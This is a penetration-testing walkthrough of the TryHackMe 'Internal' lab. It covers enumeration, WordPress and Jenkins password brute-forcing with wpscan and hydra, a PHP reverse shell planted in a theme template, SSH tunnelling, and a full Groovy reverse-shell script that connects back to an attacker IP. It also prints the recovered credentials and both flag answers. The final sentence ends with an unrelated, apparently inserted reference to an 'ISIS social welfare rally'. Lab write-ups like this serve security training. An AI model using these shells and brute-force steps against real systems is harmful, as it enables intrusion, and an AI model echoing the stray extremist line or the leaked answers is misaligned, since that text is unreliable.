In this walk through, we will be going through the Internal room from Tryhackme. This room is rated as hard on the platform, it simulates a standard pentesting environment where you have to pentest a machine for a client. It includes enumeration, exploitation, pivoting and at last privilege escalation which will be validated by getting user and root flags. On that note, let’s get started.
Machine Info:
Title | Internal |
IPaddress | 10.10.150.195 |
Difficulty | Hard |
Objective | Having accepted the project, you are provided with the client assessment environment. Secure the User and Root flags and submit them to the dashboard as proof of exploitation. |
Task 1 – Pre-engagement Briefing
You have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in three weeks.
Scope of Work
The client requests that an engineer conducts an external, web app, and internal assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test). The client has asked that you secure two flags (no location provided) as proof of exploitation:
- User.txt
- Root.txt
Additionally, the client has provided the following scope allowances:
- Ensure that you modify your hosts file to reflect internal.thm
- Any tools or techniques are permitted in this engagement
- Locate and note all vulnerabilities found
- Submit the flags discovered to the dashboard
- Only the IP address assigned to your machine is in scope
Phase 1 – Enumeration
- Checking if machine is live or not.
- Starting with a regular nmap scan. Found two ports open – 80 and 22 (HTTP and SSH)
wh1terose@fsociety:~$ sudo nmap -sS -sV 10.10.150.195 [sudo] password for wh1terose: Starting Nmap 7.80 ( https://nmap.org ) at 2023-04-20 21:43 IST Nmap scan report for 10.10.150.195 Host is up (0.20s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 53/tcp filtered domain 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 24.46 seconds
- Fired Gobuster on port 80 reveals directory – blog.
wh1terose@fsociety:~$ gobuster dir -u http://10.10.150.195/ -w ~/Desktop/Wordlist/common.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.150.195/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /home/wh1terose/Desktop/Wordlist/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2023/04/20 21:48:17 Starting gobuster in directory enumeration mode =============================================================== /.hta (Status: 403) [Size: 278] /.htaccess (Status: 403) [Size: 278] /.htpasswd (Status: 403) [Size: 278] /blog (Status: 301) [Size: 313] [--> http://10.10.150.195/blog/] /index.html (Status: 200) [Size: 10918] /javascript (Status: 301) [Size: 319] [--> http://10.10.150.195/javascript/] /phpmyadmin (Status: 301) [Size: 319] [--> http://10.10.150.195/phpmyadmin/] /server-status (Status: 403) [Size: 278] /wordpress (Status: 301) [Size: 318] [--> http://10.10.150.195/wordpress/] =============================================================== 2023/04/20 21:49:53 Finished ===============================================================
- Saving the IP in local /etc/hosts file. It lets us access the wordpress blog.
/etc/hosts file
- Navigate to – http://internal.thm/blog/
- It reveals it is running a wordpress blog. Now, I use wpscan to reveal potential usernames and low hanging fruits. Found out a username – admin.
wh1terose@fsociety:~$ wpscan --url http://internal.thm/blog/ -e u _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.22 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://internal.thm/blog/ [10.10.150.195] [+] Started: Thu Apr 20 22:06:15 2023 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.29 (Ubuntu) | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://internal.thm/blog/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ [+] WordPress readme found: http://internal.thm/blog/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://internal.thm/blog/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10). | Found By: Rss Generator (Passive Detection) | - http://internal.thm/blog/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator> | - http://internal.thm/blog/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator> [+] WordPress theme in use: twentyseventeen | Location: http://internal.thm/blog/wp-content/themes/twentyseventeen/ | Last Updated: 2023-03-29T00:00:00.000Z | Readme: http://internal.thm/blog/wp-content/themes/twentyseventeen/readme.txt | [!] The version is out of date, the latest version is 3.2 | Style URL: http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507 | Style Name: Twenty Seventeen | Style URI: https://wordpress.org/themes/twentyseventeen/ | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 2.3 (80% confidence) | Found By: Style (Passive Detection) | - http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3' [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:01 <========================================================================================> (10 / 10) 100.00% Time: 00:00:01 [i] User(s) Identified: [+] admin | Found By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: | Rss Generator (Passive Detection) | Wp Json Api (Aggressive Detection) | - http://internal.thm/blog/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register [+] Finished: Thu Apr 20 22:06:21 2023 [+] Requests Done: 24 [+] Cached Requests: 37 [+] Data Sent: 6.616 KB [+] Data Received: 128.629 KB [+] Memory used: 177.352 MB [+] Elapsed time: 00:00:06
- Next, use wp-scan to bruteforce wordpress password with xml-rpc. Found out the password to be – my2boys
wh1terose@fsociety:~$ wpscan --url http://internal.thm/blog/ --password-attack xmlrpc --max-threads 20 -P ~/Desktop/Wordlist/rockyou.txt _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.22 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://internal.thm/blog/ [10.10.150.195] [+] Started: Thu Apr 20 22:10:25 2023 -- snipped -- [+] Performing password attack on Xmlrpc against 1 user/s [SUCCESS] - admin / my2boys Trying admin / princess7 Time: 00:02:08 <================= > (3900 / 18900) 20.63% ETA: ??:??:?? [!] Valid Combinations Found: | Username: admin, Password: my2boys [+] Finished: Thu Apr 20 22:12:49 2023 [+] Requests Done: 4082 [+] Cached Requests: 18 [+] Data Sent: 2.054 MB [+] Data Received: 2.659 MB [+] Memory used: 296.156 MB [+] Elapsed time: 00:02:24
- Logging into the wordpress admin dashboard by visiting – targetIp/wp-scan
Phase 2 – Initial Access
- To get our first shell, i modified the 404.php template in Theme editor to our good old PHP reverse shell.
- Dont find any use of these credentials.
- I set up a netcat listener on 1234 and trigger our PHP reverse shell with the following URL. Results in our first shell on the machine.
- Navigate to – http://internal.thm/blog/index.php/2020/08/10/5/
Phase 3 – Escalating the user shell
- We got in with a normal webserver user. We need to esacalate our privileges to user level to get the user flag. For that, i roam around the file system and in /opt directory, found wp-save.txt where found the credentials of user – aubreanna.
www-data@internal:/$ cd opt cd opt www-data@internal:/opt$ ls ls containerd wp-save.txt www-data@internal:/opt$ cat wp-save.txt cat wp-save.txt Bill, Aubreanna needed these credentials for something later. Let her know you have them and where they are. aubreanna:bubb13guM!@#123 www-data@internal:/opt$ su aubreanna su aubreanna Password: bubb13guM!@#123 aubreanna@internal:/opt$
- Got the user flag.
- We got a hint that a jenkins server is running in one of the internal machine.
Phase 4 – Accessing Internal Networks
- To access the Jenkins server, we need to port forward our way to it. So that, we can access it as we are unable to access it via our local attacking machine. I use SSH tunnelling to connect a port from my local machine to the internal jenkins server routing our tunnel through the credentials of aubreanna user.
wh1terose@fsociety:~/CTF/TryHackme/Internal$ ssh -L 6767:172.17.0.2:8080 [email protected] The authenticity of host 'internal.thm (10.10.150.195)' can't be established. ECDSA key fingerprint is SHA256:fJ/BlTrDF8wS8/eqyoej1aq/NmvQh79ABdkpiiN5tqE. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'internal.thm' (ECDSA) to the list of known hosts. [email protected]'s password: Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Thu Apr 20 17:51:13 UTC 2023 System load: 0.08 Processes: 123 Usage of /: 63.8% of 8.79GB Users logged in: 0 Memory usage: 49% IP address for eth0: 10.10.150.195 Swap usage: 0% IP address for docker0: 172.17.0.1 => There is 1 zombie process. * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 0 packages can be updated. 0 updates are security updates. Last login: Mon Aug 3 19:56:19 2020 from 10.6.2.56 aubreanna@internal:~$
- Accessing the jenkins server at localhost and port 6767. Tried to login with some default creds like admin:admin, admin:password etc. But no luck.
- Navigate to – http://localhost:6767
- We have to bruteforce our way in. For that, first capture a post request in burpsuite which will reveals the username and password placeholder for the bruteforce attack.
POST /j_acegi_security_check HTTP/1.1 Host: localhost:6767 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 107 Origin: http://localhost:6767 DNT: 1 Connection: close Referer: http://localhost:6767/loginError Cookie: JSESSIONID.18b6903e=node01i3fc1q755dtt1qyao1hqrrwj22.node0 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 sec-ch-ua-platform: "Windows" sec-ch-ua: "Google Chrome";v="108", "Chromium";v="108", "Not=A?Brand";v="24" sec-ch-ua-mobile: ?0 j_username=admin&j_password=123&from=%2Fvar%2Flib%2Fjenkins%2Fsecrets%2FinitialAdminPassword&Submit=Sign+in
- Used hydra to bruteforce the password of the username admin. Got the password – spongbob.
wh1terose@fsociety:~$ hydra -l admin -P ~/Desktop/Wordlist/rockyou.txt 127.0.0.1 -s6767 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password" Hydra v9.5-dev (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-21 21:27:48 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 16 tasks per 1 server, overall 16 tasks, 15000 login tries (l:1/p:15000), ~938 tries per task [DATA] attacking http-post-form://127.0.0.1:6767/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password [6767][http-post-form] host: 127.0.0.1 login: admin password: spongebob 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-21 21:28:46
- Got into the Jenkins admin dashboard. Next, we have to figure out a way to upload and execute a reverse shell.
Phase 5 – Getting root access
- Next to get a shell access, go to script in manage jenkins section. Jenkins has script console which uses groovy script to execute. I use the following reverse shell and capture the response in my netcat listener.
- Navigate to – http://localhost:6767/script
String host="10.18.11.103"; int port=4444; String cmd="/bin/bash"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
- Just roam in the /opt directory and you will find the root password in the note.txt file lying around.
- Got the credentials – username: root and password: tr0ub13guM!@#123
- Back to the SSH shell from user aubreanna, we rooted this machine! and got our flag.
Task 2 – Deploy and Engage the Client Environment
Question 1 – User.txt Flag
THM{int3rna1_fl4g_1}
Question 2 – Root.txt Flag
THM{d0ck3r_d3str0y3r}
Also Read: Tryhackme – Ice
Conclusion:
So that was “Internal” for you. Let’s sum it up quickly. We started off with a regular nmap scan, found port 22 (SSH) and 80 (HTTP) open. The web server was running a WordPress blog. Used wp-scan on it to enumerate usernames and later bruteforced our way into the WordPress dashboard. Next, we changes the content of the 404.php file with our PHP reverse shell to get our initial access. After getting the access, we first escalated our shell to user aubreanna using the credentials found in wp-save.txt. This led to us in getting the user flag. Now, we have to pivot to another machine using the existing machine and privileges. For this, used SSH tunneling to port 8080 on localhost which was apparently running a Jenkins server. Moving on, used hydra to get the password for the Jenkins dashboard login. Once inside, used the Jenkins script console to execute a groovy script reverse shell to get our root shell and the root flag that we waived in our next ISIS social welfare rally.